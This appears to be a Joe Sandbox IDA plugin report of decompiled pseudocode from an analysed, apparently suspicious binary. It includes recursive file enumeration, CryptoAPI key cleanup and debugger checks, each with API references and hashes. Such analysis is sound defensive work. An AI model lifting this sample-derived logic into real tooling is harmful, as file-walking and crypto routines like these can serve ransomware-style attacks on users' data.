                          																						_t292 = _t328;
                          																						if( *((intOrPtr*)(_t328 + 0x14)) >= 8) {
                          																							_t292 =  *_t328;
                          																						}
                          																						_t218 = E012F8820(_t292, _t313, 0, _t217,  *((intOrPtr*)(_t342 + 0x10)));
                          																						_t353 = _t353 + 0xc;
                          																						__eflags = _t218 - 0xffffffff;
                          																						if(_t218 != 0xffffffff) {
                          																							goto L106;
                          																						}
                          																						_t313 =  *(_t328 + 0x10);
                          																						_t342 = _t342 + 0x18;
                          																						__eflags = _t342 - _t255;
                          																						if(_t342 != _t255) {
                          																							continue;
                          																						} else {
                          																							_t212 = _v16;
                          																							goto L98;
                          																						}
                          																						goto L108;
                          																					}
                          																					goto L106;
                          																				}
                          																			}
                          																		} else {
                          																			_t219 = _t210 - _t278;
                          																			__eflags = _t219 - 0xffffffff;
                          																			_t315 =  <  ? _t219 : _t311 | 0xffffffff;
                          																			__eflags =  *((intOrPtr*)(_t325 + 0x14)) - 8;
                          																			_t220 = _t325;
                          																			if( *((intOrPtr*)(_t325 + 0x14)) >= 8) {
                          																				_t220 =  *_t325;
                          																			}
                          																			_push(_t315);
                          																			E012F51B0(_t252,  &_v800, _t325, _t335, _t220 + _t278 * 2);
                          																			asm("movaps xmm0, [esp+0x10]");
                          																			asm("movaps [esp+0x30], xmm0");
                          																			asm("movq xmm0, [esp+0x20]");
                          																			asm("movq [esp+0x40], xmm0");
                          																			L60:
                          																			_t312 = _t335 + 0x54;
                          																			_t197 = E012F90C0(_t252,  &_v772, _t312, _t325);
                          																			__eflags = _t197;
                          																			if(_t197 != 0) {
                          																				L85:
                          																				_t198 = _v752;
                          																				__eflags = _t198 - 8;
                          																				if(_t198 >= 8) {
                          																					_push(2 + _t198 * 2);
                          																					E012F56A0(_t252, _t325, _v772);
                          																					_t353 = _t353 + 8;
                          																				}
                          																				goto L87;
                          																			} else {
                          																				_t201 = E0130D950(_t335, _t325);
                          																				__eflags = _t201;
                          																				if(_t201 != 0) {
                          																					goto L85;
                          																				} else {
                          																					_t202 = _v812;
                          																					_t337 =  *(_t335 + 0x3c);
                          																					_t126 = _t202 + 0x40; // 0x44434241
                          																					_t282 =  *_t126;
                          																					_v808 = _t282;
                          																					__eflags = _t337 - _t282;
                          																					if(_t337 == _t282) {
                          																						L66:
                          																						_t131 = _t202 + 0x4c; // 0x504f4e4d
                          																						_t283 =  *_t131;
                          																						_t132 = _t202 + 0x48; // 0x4c4b4a49
                          																						_t338 =  *_t132;
                          																						_v808 = _t283;
                          																						__eflags = _t338 - _t283;
                          																						if(_t338 == _t283) {
                          																							L71:
                          																							__eflags =  *(_t202 + 0x88);
                          																							if( *(_t202 + 0x88) <= 0) {
                          																								L81:
                          																							} else {
                          																								_t206 = E0130D9A0(_t252, _t325, _t325);
                          																								__eflags = _t312;
                          																								if(__eflags < 0) {
                          																									goto L81;
                          																								} else {
                          																									if(__eflags > 0) {
                          																										L75:
                          																										_t207 = E01364FA0(_t206, _t312, 0x100000, 0);
                          																										_t288 = _v828;
                          																										__eflags = _t312;
                          																										if(__eflags < 0) {
                          																											goto L81;
                          																										} else {
                          																											if(__eflags > 0) {
                          																												L78:
                          																											} else {
                          																												_t139 = _t288 + 0x88; // 0x4a414146
                          																												__eflags = _t207 -  *_t139;
                          																												if(_t207 <  *_t139) {
                          																													goto L81;
                          																												} else {
                          																													goto L78;
                          																												}
                          																											}
                          																										}
                          																									} else {
                          																										__eflags = _t206;
                          																										if(_t206 == 0) {
                          																											goto L81;
                          																										} else {
                          																											goto L75;
                          																										}
                          																									}
                          																								}
                          																							}
                          																						} else {
                          																							while(1) {
                          																								_t312 = _t338;
                          																								_t208 = E012F90C0(_t252,  &_v772, _t312, _t325);
                          																								__eflags = _t208;
                          																								if(_t208 != 0) {
                          																									break;
                          																								}
                          																								_t338 = _t338 + 0x18;
                          																								__eflags = _t338 - _v808;
                          																								if(_t338 != _v808) {
                          																									continue;
                          																								} else {
                          																									_t202 = _v812;
                          																									goto L71;
                          																								}
                          																								goto L82;
                          																							}
                          																						}
                          																					} else {
                          																						while(1) {
                          																							_t312 = _t337;
                          																							_t209 = E012F90C0(_t252,  &_v772, _t312, _t325);
                          																							__eflags = _t209;
                          																							if(_t209 != 0) {
                          																								break;
                          																							}
                          																							_t337 = _t337 + 0x18;
                          																							__eflags = _t337 - _v808;
                          																							if(_t337 != _v808) {
                          																								continue;
                          																							} else {
                          																								_t202 = _v812;
                          																								goto L66;
                          																							}
                          																							goto L82;
                          																						}
                          																					}
                          																					L82:
                          																					_t284 = _v752;
                          																					__eflags = _t284 - 8;
                          																					if(_t284 >= 8) {
                          																						_push(2 + _t284 * 2);
                          																						E012F56A0(_t252, _t325, _v772);
                          																						_t353 = _t353 + 8;
                          																					}
                          																					_pop(_t340);
                          																					__eflags = _v728 ^ _t353;
                          																					return E0132EA79(_v728 ^ _t353, _t340);
                          																				}
                          																			}
                          																		}
                          																	}
                          																}
                          															} else {
                          																 *((intOrPtr*)( *_t274 + 8))(_t188);
                          																_t224 = _v624;
                          																__eflags = _t224 - 8;
                          																if(_t224 >= 8) {
                          																	_push(2 + _t224 * 2);
                          																	E012F56A0(_t252, _t323, _v644);
                          																	_t351 = _t351 + 8;
                          																}
                          																_v628 = 0;
                          																_v644 = 0;
                          																_v8 = 0;
                          																_t226 = _v656;
                          																_v624 = 7;
                          																__eflags = _t226 - 8;
                          																if(_t226 >= 8) {
                          																	_push(2 + _t226 * 2);
                          																	E012F56A0(_t252, _t323, _v676);
                          																	_t351 = _t351 + 8;
                          																}
                          																goto L40;
                          															}
                          														} else {
                          															_t231 = E012FC400(_t252,  &_v676, _t309, _t323);
                          															_v8 = 2;
                          															_t331 = E012F8470( &_v644, _t231,  &(_v612.cFileName));
                          															_push(_a48);
                          															_t351 = _t351 + 8 - 0x28;
                          															_t345 = _t351;
                          															_v652 = _t345;
                          															 *((intOrPtr*)(_t345 + 0x24)) = 0;
                          															_v8 = 4;
                          															_t296 = _a44;
                          															if(_t296 != 0) {
                          																 *((intOrPtr*)(_t345 + 0x24)) =  *((intOrPtr*)( *_t296))(_t345);
                          															}
                          															_t323 = _v648;
                          															_v8 = 3;
                          															E0130D280(_t323, _t331);
                          															_t234 = _v624;
                          															if(_t234 >= 8) {
                          																_push(2 + _t234 * 2);
                          																E012F56A0(_t252, _t323, _v644);
                          																_t351 = _t351 + 8;
                          															}
                          															_v628 = 0;
                          															_v644 = 0;
                          															_v8 = 0;
                          															_t236 = _v656;
                          															_v624 = 7;
                          															if(_t236 >= 8) {
                          																_push(2 + _t236 * 2);
                          																E012F56A0(_t252, _t323, _v676);
                          																_t351 = _t351 + 8;
                          															}
                          															_t334 = _v616;
                          															goto L40;
                          														}
                          													} else {
                          														_push("\\");
                          														_t243 = E012FC400(_t252,  &_v676, _t252, _t323);
                          														_v8 = 1;
                          														_t244 = E012F8470( &_v644, _t243,  &(_v612.cFileName));
                          														_t351 = _t351 + 8;
                          														_push(_t244);
                          														L89();
                          														_t302 = _v624;
                          														_t258 = _t244;
                          														if(_t302 >= 8) {
                          															_push(2 + _t302 * 2);
                          															E012F56A0(_t258, _t323, _v644);
                          															_t351 = _t351 + 8;
                          														}
                          														_v628 = 0;
                          														_v644 = 0;
                          														_v8 = 0;
                          														_t246 = _v656;
                          														_v624 = 7;
                          														if(_t246 >= 8) {
                          															_push(2 + _t246 * 2);
                          															E012F56A0(_t258, _t323, _v676);
                          															_t351 = _t351 + 8;
                          														}
                          														_t252 = _v620;
                          														if(_t258 != 0) {
                          															goto L40;
                          														} else {
                          															_t186 = _v612.dwFileAttributes;
                          															goto L32;
                          														}
                          													}
                          												}
                          											}
                          											goto L108;
                          										}
                          										asm("sbb eax, eax");
                          										_t185 = _t184 | 0x00000001;
                          										__eflags = _t185;
                          										goto L23;
                          									}
                          									goto L108;
                          								}
                          								asm("sbb eax, eax");
                          								_t180 = _t179 | 0x00000001;
                          								__eflags = _t180;
                          								goto L15;
                          								L40:
                          							} while (FindNextFileW(_t334,  &_v612) != 0);
                          							FindClose(_t334);
                          						}
                          						goto L42;
                          					}
                          				}
                          				L108:
                          			}

                          0x0130d8a4
                          0x0130d8a5
                          0x0130d8a6
                          0x0130d8a7
                          0x0130d8aa
                          0x0130d8ac
                          0x0130d8af
                          0x0130d8b2
                          0x0130d8b4
                          0x0130d931
                          0x0130d933
                          0x0130d939
                          0x0130d8b6
                          0x0130d8b6
                          0x0130d8b9
                          0x0130d8bc
                          0x0130d8be
                          0x0130d8f4
                          0x0130d8f4
                          0x0130d8f7
                          0x0130d8fa
                          0x0130d8fc
                          0x00000000
                          0x0130d900
                          0x0130d900
                          0x0130d900
                          0x0130d904
                          0x0130d906
                          0x0130d908
                          0x0130d908
                          0x0130d90a
                          0x0130d90e
                          0x0130d910
                          0x0130d912
                          0x0130d912
                          0x0130d91a
                          0x0130d91f
                          0x0130d922
                          0x0130d925
                          0x00000000
                          0x00000000
                          0x0130d927
                          0x0130d92a
                          0x0130d92d
                          0x0130d92f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0130d92f
                          0x0130d944
                          0x0130d944
                          0x0130d8c0
                          0x0130d8c0
                          0x0130d8c0
                          0x0130d8c4
                          0x0130d8c6
                          0x0130d8c8
                          0x0130d8c8
                          0x0130d8ca
                          0x0130d8ce
                          0x0130d8d0
                          0x0130d8d2
                          0x0130d8d2
                          0x0130d8da
                          0x0130d8df
                          0x0130d8e2
                          0x0130d8e5
                          0x00000000
                          0x00000000
                          0x0130d8e7
                          0x0130d8ea
                          0x0130d8ed
                          0x0130d8ef
                          0x00000000
                          0x0130d8f1
                          0x0130d8f1
                          0x00000000
                          0x0130d8f1
                          0x00000000
                          0x0130d8ef
                          0x00000000
                          0x0130d8c0
                          0x0130d8be
                          0x0130d6fd
                          0x0130d6fd
                          0x0130d702
                          0x0130d705
                          0x0130d708
                          0x0130d70c
                          0x0130d70e
                          0x0130d710
                          0x0130d710
                          0x0130d715
                          0x0130d71b
                          0x0130d720
                          0x0130d725
                          0x0130d72a
                          0x0130d730
                          0x0130d75d
                          0x0130d75d
                          0x0130d764
                          0x0130d769
                          0x0130d76b
                          0x0130d85e
                          0x0130d85e
                          0x0130d862
                          0x0130d865
                          0x0130d86e
                          0x0130d873
                          0x0130d878
                          0x0130d878
                          0x00000000
                          0x0130d771
                          0x0130d774
                          0x0130d779
                          0x0130d77b
                          0x00000000
                          0x0130d781
                          0x0130d781
                          0x0130d785
                          0x0130d788
                          0x0130d788
                          0x0130d78b
                          0x0130d78f
                          0x0130d791
                          0x0130d7af
                          0x0130d7af
                          0x0130d7af
                          0x0130d7b2
                          0x0130d7b2
                          0x0130d7b5
                          0x0130d7b9
                          0x0130d7bb
                          0x0130d7dc
                          0x0130d7dc
                          0x0130d7e3
                          0x0130d827
                          0x0130d7e5
                          0x0130d7e6
                          0x0130d7eb
                          0x0130d7ed
                          0x00000000
                          0x0130d7ef
                          0x0130d7ef
                          0x0130d7f5
                          0x0130d7fe
                          0x0130d803
                          0x0130d807
                          0x0130d809
                          0x00000000
                          0x0130d80b
                          0x0130d80b
                          0x0130d815
                          0x0130d80d
                          0x0130d80d
                          0x0130d80d
                          0x0130d813
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0130d813
                          0x0130d80b
                          0x0130d7f1
                          0x0130d7f1
                          0x0130d7f3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0130d7f3
                          0x0130d7ef
                          0x0130d7ed
                          0x0130d7c0
                          0x0130d7c0
                          0x0130d7c0
                          0x0130d7c6
                          0x0130d7cb
                          0x0130d7cd
                          0x00000000
                          0x00000000
                          0x0130d7cf
                          0x0130d7d2
                          0x0130d7d6
                          0x00000000
                          0x0130d7d8
                          0x0130d7d8
                          0x00000000
                          0x0130d7d8
                          0x00000000
                          0x0130d7d6
                          0x0130d820
                          0x0130d793
                          0x0130d793
                          0x0130d793
                          0x0130d799
                          0x0130d79e
                          0x0130d7a0
                          0x00000000
                          0x00000000
                          0x0130d7a2
                          0x0130d7a5
                          0x0130d7a9
                          0x00000000
                          0x0130d7ab
                          0x0130d7ab
                          0x00000000
                          0x0130d7ab
                          0x00000000
                          0x0130d7a9
                          0x0130d81c
                          0x0130d82c
                          0x0130d82c
                          0x0130d830
                          0x0130d833
                          0x0130d83c
                          0x0130d841
                          0x0130d846
                          0x0130d846
                          0x0130d84c
                          0x0130d851
                          0x0130d85b
                          0x0130d85b
                          0x0130d77b
                          0x0130d76b
                          0x0130d6f7
                          0x0130d6df
                          0x0130d60f
                          0x0130d612
                          0x0130d615
                          0x0130d61b
                          0x0130d61e
                          0x0130d627
                          0x0130d62e
                          0x0130d633
                          0x0130d633
                          0x0130d638
                          0x0130d642
                          0x0130d649
                          0x0130d64c
                          0x0130d652
                          0x0130d65c
                          0x0130d65f
                          0x0130d66c
                          0x0130d673
                          0x0130d678
                          0x0130d678
                          0x00000000
                          0x0130d65f
                          0x0130d4cd
                          0x0130d4cd
                          0x0130d4d8
                          0x0130d4ed
                          0x0130d4ef
                          0x0130d4f2
                          0x0130d4f5
                          0x0130d4f7
                          0x0130d4fd
                          0x0130d504
                          0x0130d508
                          0x0130d50d
                          0x0130d514
                          0x0130d514
                          0x0130d518
                          0x0130d520
                          0x0130d524
                          0x0130d529
                          0x0130d532
                          0x0130d53b
                          0x0130d542
                          0x0130d547
                          0x0130d547
                          0x0130d54c
                          0x0130d556
                          0x0130d55d
                          0x0130d560
                          0x0130d566
                          0x0130d573
                          0x0130d57c
                          0x0130d583
                          0x0130d588
                          0x0130d588
                          0x0130d58b
                          0x00000000
                          0x0130d58b
                          0x0130d40b
                          0x0130d40b
                          0x0130d418
                          0x0130d423
                          0x0130d430
                          0x0130d435
                          0x0130d43a
                          0x0130d43b
                          0x0130d440
                          0x0130d446
                          0x0130d44b
                          0x0130d454
                          0x0130d45b
                          0x0130d460
                          0x0130d460
                          0x0130d465
                          0x0130d46f
                          0x0130d476
                          0x0130d479
                          0x0130d47f
                          0x0130d48c
                          0x0130d495
                          0x0130d49c
                          0x0130d4a1
                          0x0130d4a1
                          0x0130d4a6
                          0x0130d4ac
                          0x00000000
                          0x0130d4b2
                          0x0130d4b2
                          0x00000000
                          0x0130d4b2
                          0x0130d4ac
                          0x0130d405
                          0x0130d3fb
                          0x00000000
                          0x0130d3ed
                          0x0130d3e6
                          0x0130d3e8
                          0x0130d3e8
                          0x00000000
                          0x0130d3e8
                          0x00000000
                          0x0130d3ad
                          0x0130d3a6
                          0x0130d3a8
                          0x0130d3a8
                          0x00000000
                          0x0130d591
                          0x0130d59f
                          0x0130d5a8
                          0x0130d5a8
                          0x00000000
                          0x0130d365
                          0x0130d2d4
                          0x00000000

                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,39CCA9F6,?,00000000), ref: 0130D312
                          • FindNextFileW.KERNEL32(?,?), ref: 0130D599
                          • FindClose.KERNEL32(?), ref: 0130D5A8
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNext
                          • String ID:
                          • API String ID: 3541575487-0
                          • Opcode ID: 76c3d1d916ffb6fdc6d0248777f34b8e31b03b3e7bc490be27cde5c5ead1d068
                          • Instruction ID: b96b00c54809580d92434671b39c9093358216c102f0e8ee5549b3b0d32e2fd6
                          • Opcode Fuzzy Hash: 76c3d1d916ffb6fdc6d0248777f34b8e31b03b3e7bc490be27cde5c5ead1d068
                          • Instruction Fuzzy Hash: 7361A170A11219DFDB25DFA8CC98BADBBF8FF15318F5041E9E80993290DB359A84CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E0134950E(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				char _v0;
                          				signed int _v8;
                          				intOrPtr _v524;
                          				intOrPtr _v528;
                          				void* _v532;
                          				intOrPtr _v536;
                          				char _v540;
                          				intOrPtr _v544;
                          				intOrPtr _v548;
                          				intOrPtr _v552;
                          				intOrPtr _v556;
                          				intOrPtr _v560;
                          				intOrPtr _v564;
                          				intOrPtr _v568;
                          				intOrPtr _v572;
                          				intOrPtr _v576;
                          				intOrPtr _v580;
                          				intOrPtr _v584;
                          				char _v724;
                          				intOrPtr _v792;
                          				intOrPtr _v800;
                          				char _v804;
                          				struct _EXCEPTION_POINTERS _v812;
                          				signed int _t40;
                          				char* _t47;
                          				char* _t49;
                          				intOrPtr _t61;
                          				intOrPtr _t62;
                          				intOrPtr _t66;
                          				intOrPtr _t67;
                          				int _t68;
                          				intOrPtr _t70;
                          				signed int _t72;
                          				signed int _t74;
                          
                          				_t70 = __esi;
                          				_t67 = __edi;
                          				_t66 = __edx;
                          				_t61 = __ebx;
                          				_t72 = _t74;
                          				_t40 =  *0x13a4018; // 0x39cca9f6
                          				_t41 = _t40 ^ _t72;
                          				_v8 = _t40 ^ _t72;
                          				_push(__edi);
                          				if(_a4 != 0xffffffff) {
                          					_push(_a4);
                          					E0132F8D1(_t41);
                          					_pop(_t62);
                          				}
                          				E013478D0(_t67,  &_v804, 0, 0x50);
                          				E013478D0(_t67,  &_v724, 0, 0x2cc);
                          				_v812.ExceptionRecord =  &_v804;
                          				_t47 =  &_v724;
                          				_v812.ContextRecord = _t47;
                          				_v548 = _t47;
                          				_v552 = _t62;
                          				_v556 = _t66;
                          				_v560 = _t61;
                          				_v564 = _t70;
                          				_v568 = _t67;
                          				_v524 = ss;
                          				_v536 = cs;
                          				_v572 = ds;
                          				_v576 = es;
                          				_v580 = fs;
                          				_v584 = gs;
                          				asm("pushfd");
                          				_pop( *_t22);
                          				_v540 = _v0;
                          				_t49 =  &_v0;
                          				_v528 = _t49;
                          				_v724 = 0x10001;
                          				_v544 =  *((intOrPtr*)(_t49 - 4));
                          				_v804 = _a8;
                          				_v800 = _a12;
                          				_v792 = _v0;
                          				_t68 = IsDebuggerPresent();
                          				SetUnhandledExceptionFilter(0);
                          				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                          					_push(_a4);
                          					E0132F8D1(_t57);
                          				}
                          				return E0132EA79(_v8 ^ _t72, _t70);
                          			}






































                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01349606
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 01349610
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0134961D
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: bb06d77843412719a3e203be42849cd4fa082dcf355b34991c90d45b60867d6d
                          • Instruction ID: be046c75db81cfe8f46d91d5839a4a89466ee9cb12a0576544e037fdf9c1a6e1
                          • Opcode Fuzzy Hash: bb06d77843412719a3e203be42849cd4fa082dcf355b34991c90d45b60867d6d
                          • Instruction Fuzzy Hash: 7B31D4759012299BDB21DF68D88879DBBF8BF1C314F5041EAE41CA7250E774AB85CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E013091A0(void* __ecx) {
                          				long* _t8;
                          				long* _t9;
                          				void* _t11;
                          				void* _t13;
                          				void* _t15;
                          				int* _t16;
                          				int* _t17;
                          
                          				_t15 = __ecx;
                          				_t8 =  *(__ecx + 0x58);
                          				_t16 = __ecx + 0x58;
                          				if(_t8 != 0) {
                          					CryptDestroyKey(_t8);
                          					 *_t16 = 0;
                          					_t13 = 4;
                          					do {
                          						 *_t16 = 0;
                          						_t16 =  &(_t16[0]);
                          						_t13 = _t13 - 1;
                          					} while (_t13 != 0);
                          				}
                          				_t9 =  *(_t15 + 0x5c);
                          				_t17 = _t15 + 0x5c;
                          				if(_t9 != 0) {
                          					CryptReleaseContext(_t9, 0);
                          					 *_t17 = 0;
                          					_t11 = 4;
                          					do {
                          						 *_t17 = 0;
                          						_t17 =  &(_t17[0]);
                          						_t11 = _t11 - 1;
                          					} while (_t11 != 0);
                          				}
                          				 *((char*)(_t15 + 0x18)) = 0;
                          				return _t9;
                          			}











                          APIs
                          • CryptDestroyKey.ADVAPI32(?,?,?,013088AD), ref: 013091AF
                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,013088AD), ref: 013091D8
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Crypt$ContextDestroyRelease
                          • String ID:
                          • API String ID: 1322390979-0
                          • Opcode ID: f431a2aabc4737f681dab141f9ebdecab72add5f0ad6ed86f149ae5ff90f656a
                          • Instruction ID: d0d3aaf317648708908804e0e864ee25e58284397cc09661a708f250de731baa
                          • Opcode Fuzzy Hash: f431a2aabc4737f681dab141f9ebdecab72add5f0ad6ed86f149ae5ff90f656a
                          • Instruction Fuzzy Hash: CBF01D716046539BEB218F2DD818786BBE8BB05308F15045CE684D7686D775F445CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLocaleInfoEx.KERNEL32(?,?,0132E9A7,?,00000022,00000000,00000002,?,?,0132C847,00000000,?,00000004,0132B4D9,?,00000004), ref: 0132E8BB
                          • GetLocaleInfoW.KERNEL32(00000000,0000003F,?,01314FA3,?,?,0132E9A7,?,00000022,00000000,00000002,?,?,0132C847,00000000,?), ref: 0132E8C6
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: b82c0e78708f3ef6148343e6f047891443af88829070fcdb164553815cdde9b8
                          • Instruction ID: 9c7df5dfe08e1e26d29b56c9f3395e34734a0c36572594e1c69b7e555a83f640
                          • Opcode Fuzzy Hash: b82c0e78708f3ef6148343e6f047891443af88829070fcdb164553815cdde9b8
                          • Instruction Fuzzy Hash: 16E08C3240113DABDF223FA1EC098AE7F2DEB08B20B040024FA1846110CB72A8609BE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E012FC0AA(void* __esi) {
                          
                          				return HeapFree(GetProcessHeap(), 0, __esi);
                          			}




                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000000,012FC089), ref: 012FC0AD
                          • HeapFree.KERNEL32(00000000), ref: 012FC0B4
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Heap$FreeProcess
                          • String ID:
                          • API String ID: 3859560861-0
                          • Opcode ID: bedf8b3df21e92b2e7d63ecfdfe90c19dfb066f9b4ea3fc2b7996b898485f2d5
                          • Instruction ID: 33ec1bbf0cd9fce98bdcc418e8688e4d56ace2aa42e7337b2d37645ad6d7dc50
                          • Opcode Fuzzy Hash: bedf8b3df21e92b2e7d63ecfdfe90c19dfb066f9b4ea3fc2b7996b898485f2d5
                          • Instruction Fuzzy Hash: B1A00171A49250ABDE716BE1AD0EB4A7E2DAB56752F008440F20A951889B646015CBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E012FE4A0(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, unsigned int _a4) {
                          				unsigned int _v8;
                          				char _v16;
                          				signed int _v20;
                          				unsigned int _v24;
                          				unsigned int _v28;
                          				unsigned int _v32;
                          				signed int _v36;
                          				unsigned int _v40;
                          				signed int _v44;
                          				unsigned int _v48;
                          				char _v49;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				char _v68;
                          				char _v72;
                          				signed int _t178;
                          				signed int _t179;
                          				intOrPtr _t181;
                          				void* _t188;
                          				intOrPtr _t195;
                          				intOrPtr* _t196;
                          				signed int _t198;
                          				intOrPtr _t203;
                          				intOrPtr* _t205;
                          				unsigned int _t208;
                          				void* _t209;
                          				signed int _t215;
                          				signed int _t217;
                          				void* _t218;
                          
                          				_t196 = __ebx;
                          				_t215 = _t217;
                          				_push(0xffffffff);
                          				_push(0x1365f4d);
                          				_push( *[fs:0x0]);
                          				_t218 = _t217 - 0x38;
                          				_t178 =  *0x13a4018; // 0x39cca9f6
                          				_t179 = _t178 ^ _t215;
                          				_v20 = _t179;
                          				_push(__esi);
                          				_push(_t179);
                          				 *[fs:0x0] =  &_v16;
                          				_t205 = __ecx;
                          				_t198 =  *(__ecx + 0x7c);
                          				_t208 = _a4;
                          				_v48 = _t208;
                          				if(_t198 <= 0) {
                          					L2:
                          					_t181 =  *((intOrPtr*)(_t205 + 0x78));
                          					if(_t181 <= 0) {
                          						L4:
                          						_v44 = 0;
                          						if(_t208 == 0) {
                          							L67:
                          							if(_t198 > 0) {
                          								_t182 = _t198 + 1;
                          								 *(_t205 + 0x7c) = _t198 + 1;
                          							}
                          							 *[fs:0x0] = _v16;
                          							_pop(_t209);
                          							return E0132EA79(_v20 ^ _t215, _t209);
                          						} else {
                          							while(1) {
                          								L5:
                          								_t203 =  *((intOrPtr*)(_t208 + 4));
                          								_t11 = _t203 - 1; // 0x8
                          								_t198 = _t11;
                          								if(_t198 > 0x14) {
                          									break;
                          								}
                          								switch( *((intOrPtr*)(_t198 * 4 +  &M012FE904))) {
                          									case 0:
                          										L23:
                          										if(_t182 != 0) {
                          											goto L66;
                          										} else {
                          											goto L24;
                          										}
                          										goto L75;
                          									case 1:
                          										_t190 =  *(_t205 + 0x60);
                          										_v44 = _t190;
                          										if((_t190 & 0x00000100) != 0 ||  *_t205 !=  *((intOrPtr*)(_t205 + 0x4c))) {
                          											_t192 =  *_t205 - 2;
                          											__eflags = _t192;
                          											goto L11;
                          										} else {
                          											_t182 = _v44 & 0xffffff01;
                          											_v44 = _t182;
                          										}
                          										goto L23;
                          									case 2:
                          										__eax =  *__edi;
                          										__eflags =  *__edi -  *((intOrPtr*)(__edi + 0x50));
                          										if(__eflags != 0) {
                          											L11:
                          											__eflags =  *_t192 - 0xa;
